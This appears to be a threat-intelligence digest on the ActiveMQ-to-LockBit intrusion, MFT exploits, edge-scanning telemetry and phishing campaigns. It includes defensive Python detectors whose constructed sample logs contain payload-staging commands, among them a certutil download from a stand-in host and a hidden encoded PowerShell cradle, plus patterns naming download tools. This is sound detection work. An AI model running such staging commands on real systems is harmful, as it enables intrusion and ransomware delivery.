Exploitation of Managed File Transfer and Messaging Server Vulnerabilities for Remote Code Execution and Ransomware Deployment
Threat actors continue to prioritize internet-facing infrastructure that provides high-leverage initial access, and multiple reports highlight active exploitation of remote code execution (RCE) paths in widely deployed services. A DFIR case study described attackers exploiting Apache ActiveMQ CVE-2023-46604 by sending a crafted OpenWire command that made the broker instantiate a Spring ClassPathXmlApplicationContext pointed at an attacker-hosted XML configuration, so that the broker itself executed the attacker's commands. From there the intrusion moved quickly: payload retrieval via certutil, privilege escalation to SYSTEM, credential dumping from LSASS and, after re-entry using the previously stolen privileged credentials, LockBit ransomware deployment over RDP. Separately, incident-response reporting warned of ongoing exploitation of Managed File Transfer (MFT) products: Gladinet CentreStack, where an unauthenticated local file inclusion flaw (CVE-2025-11371) lets an attacker read the application's machine key and chain into the earlier ViewState deserialization RCE tracked as CVE-2025-30406, and Fortra GoAnywhere MFT, where a deserialization flaw (CVE-2025-10035) leads directly to RCE. Observed activity was linked to a threat group associated with Medusa ransomware.
Broader telemetry and research reinforced that edge and externally exposed services remain the primary battleground for initial access at scale. GreyNoise reported nearly 3 billion malicious sessions against edge infrastructure in the second half of 2025, with heavy targeting of enterprise VPNs (notably Palo Alto GlobalProtect), continued exploitation attempts against older issues such as CVE-2020-2034 (a 2020 GlobalProtect OS command injection), and pervasive scanning of SSH and remote access services. In parallel, financially motivated and cybercrime-enabling ecosystems are improving their ability to reach victims: Varonis detailed 1Campaign, a cloaking service that helps malicious Google Ads evade review by serving benign pages to scanners while directing real users to phishing and crypto-drainer content, and Have I Been Squatted documented Diesel Vortex, a logistics-focused credential-phishing operation that used dozens of domains and an exposed backend repository to support industrialized theft. These trends align with reporting that attackers increasingly use AI-assisted social engineering and tooling (including deepfakes and AI-generated phishing), and with law-enforcement actions such as the Interpol-backed Operation Red Card 2.0, which resulted in 651 arrests and $4.3M recovered from cyber-enabled fraud activity across 16 African countries.

How this story unfolded
11 events, listed from the most recent confirmed update back to the earliest known activity.
Incident report links ActiveMQ exploitation to LockBit deployment
A public report described how exploitation of CVE-2023-46604 led to enterprise compromise and ransomware deployment, emphasizing the roughly 19-day timeline from initial access to encryption. The report highlighted patching failures, credential hardening, and monitoring for log clearing and remote tool installation as key lessons.
GreyNoise reports edge systems bore the brunt of 2025 exploitation
GreyNoise published findings showing that edge infrastructure was the primary target of internet-wide exploitation attempts in late 2025, with concentrated abuse from a small set of hosting providers and evidence of shared tooling across campaigns. The report also noted that attackers were scanning and enumerating LLM inference servers such as Ollama.
Researchers detail Diesel Vortex credential theft and operator links
Researchers disclosed that the Diesel Vortex campaign had harvested nearly 3,500 credential pairs, including 1,649 unique credentials, and used phishing, vishing, Telegram-channel infiltration, and real-time operator interaction to capture passwords and 2FA codes. OSINT analysis linked the activity to Armenian-language operators and Russian-connected infrastructure and entities.
Varonis reveals 1Campaign cloaking service behind malicious Google Ads
Varonis reported that the 1Campaign cybercrime platform has been helping malicious Google Ads evade detection for at least three years by cloaking content from researchers and automated scanners. The service filters visitors in real time and redirects likely victims to phishing pages and crypto-drainer sites while showing benign pages to others.
Coordinated takedown disrupts parts of Diesel Vortex infrastructure
GitLab, Cloudflare, Google Threat Intelligence, CrowdStrike, and Microsoft Threat Intelligence Center worked together to disrupt portions of the Diesel Vortex phishing infrastructure. The action followed researchers' discovery of exposed backend data, including an SQL database and Telegram webhook logs tied to the operation.
Diesel Vortex phishing campaign begins targeting logistics sector
A financially motivated group dubbed Diesel Vortex began a phishing campaign in September 2025 against freight and logistics organizations in the U.S. and Europe. The operation used dozens of domains and impersonated major freight-industry platforms to steal credentials.
Attackers shift RDP credential spraying toward residential IP space
As part of the broader second-half 2025 activity, credential-spraying campaigns against U.S. RDP services expanded rapidly and increasingly used residential IP addresses, especially from Brazil and Argentina. This shift reduced the effectiveness of traditional reputation- and geo-based blocking.
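When the spraying sources are residential addresses spread across many networks, blocking by reputation or country stops working, and detection has to key on the shape of the failures instead. The script below is an added example (not code from GreyNoise or from the report) that runs that idea over constructed Windows 4625 failed-logon summaries: it flags a single loud source cycling through accounts, and separately flags a window in which many quiet sources each make only a few attempts but together cover many accounts. Addresses are RFC 5737 documentation ranges, the account names are invented, and the thresholds are assumptions to tune per environment.

```python
"""Behavioural detection for RDP credential spraying (added example; not code
from GreyNoise or the report). The logic keys on what the failures look like
in aggregate, not on source reputation or geography:

- single_source_spray: one address fails against many distinct accounts;
- distributed_spray: many addresses each make only a few attempts, but
  together cover many accounts in the same window.

Input lines are constructed Windows 4625 (failed logon) summaries in the
layout 'timestamp 4625 source_ip logon_type target_user'; addresses are RFC
5737 documentation ranges and the account names are invented.
"""
from __future__ import annotations

from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class FailedLogon:
    ts: datetime
    source: str
    logon_type: int
    user: str


def parse_4625(line: str) -> FailedLogon:
    ts, event_id, source, logon_type, user = line.split()
    assert event_id == "4625"
    return FailedLogon(datetime.fromisoformat(ts), source, int(logon_type), user.lower())


def find_sprays(events, window_minutes=10, min_users=5, max_per_ip=3, min_sources=10):
    """Return findings per fixed time window, RDP only (logon types 3 and 10)."""
    buckets = defaultdict(list)
    for ev in events:
        if ev.logon_type not in (3, 10):       # NLA pre-auth failures log as type 3
            continue
        start = ev.ts.replace(minute=ev.ts.minute - ev.ts.minute % window_minutes,
                              second=0, microsecond=0)
        buckets[start].append(ev)

    findings = []
    for start, evs in sorted(buckets.items()):
        users_by_ip = defaultdict(set)
        attempts_by_ip = Counter()
        for ev in evs:
            users_by_ip[ev.source].add(ev.user)
            attempts_by_ip[ev.source] += 1
        # Loud spray: one source cycling through accounts.
        for ip, users in users_by_ip.items():
            if len(users) >= min_users:
                findings.append({"type": "single_source_spray", "window": start,
                                 "source": ip, "users": len(users)})
        # Low-and-slow spray: many quiet sources, broad account coverage between them.
        quiet = [ip for ip, n in attempts_by_ip.items() if n <= max_per_ip]
        covered = set().union(*(users_by_ip[ip] for ip in quiet)) if quiet else set()
        if len(quiet) >= min_sources and len(covered) >= min_users:
            findings.append({"type": "distributed_spray", "window": start,
                             "sources": len(quiet), "users": len(covered)})
    return findings


def _constructed_lines() -> list[str]:
    """Constructed sample: a distributed spray, a noisy spray, and a benign user."""
    base = datetime(2025, 11, 3, 2, 0, tzinfo=timezone.utc)
    users = ["administrator", "jsmith", "backup", "svc_rdp", "helpdesk", "mgarcia"]
    lines = []
    # 12 residential-looking sources, two guesses each, 20 s apart (distributed spray)
    for i in range(12):
        for j in range(2):
            t = base + timedelta(seconds=20 * (2 * i + j))
            lines.append(f"{t.isoformat()} 4625 203.0.113.{10 + i} 10 {users[(i + j) % 6]}")
    # one noisy source trying every account (classic single-source spray)
    for k, user in enumerate(users):
        t = base + timedelta(seconds=30 * k)
        lines.append(f"{t.isoformat()} 4625 198.51.100.9 3 {user}")
    # a user mistyping their own password four times (must not fire)
    for k in range(4):
        t = base + timedelta(minutes=5, seconds=15 * k)
        lines.append(f"{t.isoformat()} 4625 192.0.2.55 10 jsmith")
    return lines


EVENTS = [parse_4625(line) for line in _constructed_lines()]

if __name__ == "__main__":
    for finding in find_sprays(EVENTS):
        print(finding)
```

The distributed rule deliberately ignores sources that are loud on their own (they are caught by the single-source rule) and counts only the quiet ones, which is the population a per-IP threshold or a geo-block would miss. In production the same aggregation can be expressed as a SIEM query over Event ID 4625 with the window and thresholds from `find_sprays`.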
Internet-wide exploitation surges against edge infrastructure
During the second half of 2025, GreyNoise observed sustained large-scale exploitation attempts against internet-facing edge systems, including VPNs, routers, SSH, and RDP services. The activity totaled nearly 3 billion malicious sessions over 162 days and heavily targeted platforms such as Palo Alto, Cisco, and Fortinet.
LockBit ransomware deployed after ActiveMQ compromise
Following re-entry and lateral movement, the attackers executed LockBit payloads across the enterprise and encrypted systems. Ransom notes pointed victims to the Session messaging app instead of official LockBit infrastructure, suggesting an affiliate or independent actor using the leaked LockBit Black builder.
Attackers re-enter through unpatched ActiveMQ server after eviction
After defenders removed the intruders on the second day of the incident, the still-unpatched ActiveMQ server allowed the same exploit path to be used again 18 days later. The attackers returned, validated domain admin access, conducted discovery, and moved laterally via RDP.
Attackers exploit Apache ActiveMQ flaw to gain initial access
In mid-February 2024, attackers exploited CVE-2023-46604 on an exposed Windows-based Apache ActiveMQ server by forcing it to load a remote Spring XML configuration. They used the access to download a Metasploit stager, escalate privileges, and dump LSASS credentials within about 40 minutes.
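Two checks follow from the ActiveMQ chain described in the summary and in the event above: whether a broker build still predates the CVE-2023-46604 fix (the re-entry on this page happened because the server was never patched), and whether the broker's java.exe has spawned a payload-staging child such as certutil, which is the first observable step after the remote Spring XML is loaded. The script below is an added example, not code from the incident report or from Apache ActiveMQ. The fixed versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3 come from the Apache advisory; treating 6.x and later 5.x branches as patched is an assumption noted in the code. The telemetry lines are constructed Sysmon-style process-creation records, not captured data, and use RFC 5737 addresses.

```python
"""Checks for the ActiveMQ chain on this page (added example; not code from
the incident report or from Apache ActiveMQ).

1. is_vulnerable(): does a 5.x broker predate the CVE-2023-46604 fix
   (5.15.16, 5.16.7, 5.17.6, 5.18.3 per the Apache advisory)?
2. detect(): over process-creation telemetry, flag a child of the broker's
   java.exe that stages a payload (certutil -urlcache, a PowerShell download
   cradle, bitsadmin) or is a shell. The records below are constructed
   Sysmon-style lines, not captured data; addresses are RFC 5737 ranges.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# 5.<minor> branch -> first patched release on that branch (Apache advisory).
FIXED_PATCH = {15: 16, 16: 7, 17: 6, 18: 3}


def is_vulnerable(version: str) -> bool:
    """True if an ActiveMQ 5.x version string is below the fix for CVE-2023-46604."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if major != 5:
        return False        # assumption: 6.x and later ship with the fix
    if minor < 15:
        return True         # 5.0 - 5.14 never received a fix
    if minor in FIXED_PATCH:
        return patch < FIXED_PATCH[minor]
    return False            # assumption: any later 5.x branch postdates the fix


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse the constructed 'ts|ParentImage|ParentCommandLine|Image|CommandLine' layout."""
    return ProcEvent(*line.split("|", 4))


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


# The broker's java.exe is recognisable by 'activemq' in its command line.
BROKER_MARKER = re.compile(r"activemq", re.I)

# (child image, argument shape) pairs that warrant an alert under the broker.
SUSPICIOUS_CHILD = [
    (re.compile(r"certutil\.exe"), re.compile(r"-urlcache|-decode", re.I)),
    (re.compile(r"(powershell|pwsh)\.exe"),
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-e(nc|ncodedcommand)?\b", re.I)),
    (re.compile(r"bitsadmin\.exe"), re.compile(r"/transfer", re.I)),
    (re.compile(r"(cmd|mshta|rundll32|regsvr32)\.exe"), re.compile(r"")),  # any shell or LOLBin
]


def classify(ev: ProcEvent) -> str | None:
    """Return an alert line when the broker spawned a staging or shell child, else None."""
    if _basename(ev.parent_image) not in ("java.exe", "javaw.exe"):
        return None
    if not BROKER_MARKER.search(ev.parent_cmdline):
        return None             # some other JVM (Tomcat, a reporting tool): out of scope
    child = _basename(ev.image)
    for img_re, arg_re in SUSPICIOUS_CHILD:
        if img_re.fullmatch(child) and arg_re.search(ev.cmdline):
            return f"{ev.ts} ActiveMQ broker spawned {child}: {ev.cmdline}"
    return None


def detect(lines: list[str]) -> list[str]:
    return [hit for hit in (classify(parse_event(line)) for line in lines) if hit]


JAVA = r"C:\Program Files\Java\jre\bin\java.exe"
BROKER_CMD = r"java -Dactivemq.home=C:\apache-activemq-5.15.9 -jar bin\activemq.jar start"
SAMPLE_EVENTS = [
    # constructed: stager fetched with certutil, as in the report
    f"2024-02-15T10:02:11Z|{JAVA}|{BROKER_CMD}|C:\\Windows\\System32\\certutil.exe|"
    "certutil -urlcache -split -f http://192.0.2.10/update.exe C:\\Windows\\Temp\\update.exe",
    # constructed: broker spawns a shell for discovery
    f"2024-02-15T10:02:40Z|{JAVA}|{BROKER_CMD}|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami",
    # constructed: encoded PowerShell cradle (payload elided)
    f"2024-02-15T10:03:02Z|{JAVA}|{BROKER_CMD}|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -enc AAAA",
    # constructed, benign: a different JVM running certutil (not the broker)
    f"2024-02-15T10:05:00Z|{JAVA}|java -jar C:\\apps\\reporting.jar|"
    "C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://192.0.2.20/cert.crt",
    # constructed, benign: interactive admin use from Explorer
    "2024-02-15T10:06:30Z|C:\\Windows\\explorer.exe|explorer.exe|"
    "C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://192.0.2.20/cert.crt",
]

if __name__ == "__main__":
    print("5.15.9 vulnerable:", is_vulnerable("5.15.9"))
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The parent-process condition is what keeps this rule quiet: certutil and PowerShell downloads are common in ordinary administration, but a JVM running the ActiveMQ broker has no business launching them, so the same argument patterns that would be noisy fleet-wide become high-confidence when scoped to the broker. Pair the detection with the version check, because an alert on a still-unpatched broker should be treated as the start of a re-entry, as it was here.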
Sources
Threat Actors Exploit Apache ActiveMQ Server Vulnerability to Gain RDP Access and Deploy LockBit Ransomware
cybersecuritynews.com
Edge systems take the brunt of internet-wide exploitation attempts
helpnetsecurity.com
1Campaign platform helps malicious Google ads evade detection
bleepingcomputer.com
Phishing campaign targets freight and logistics orgs in the US, Europe
bleepingcomputer.com
Managed File Transfer Exploits: Here to Stay?
areteir.com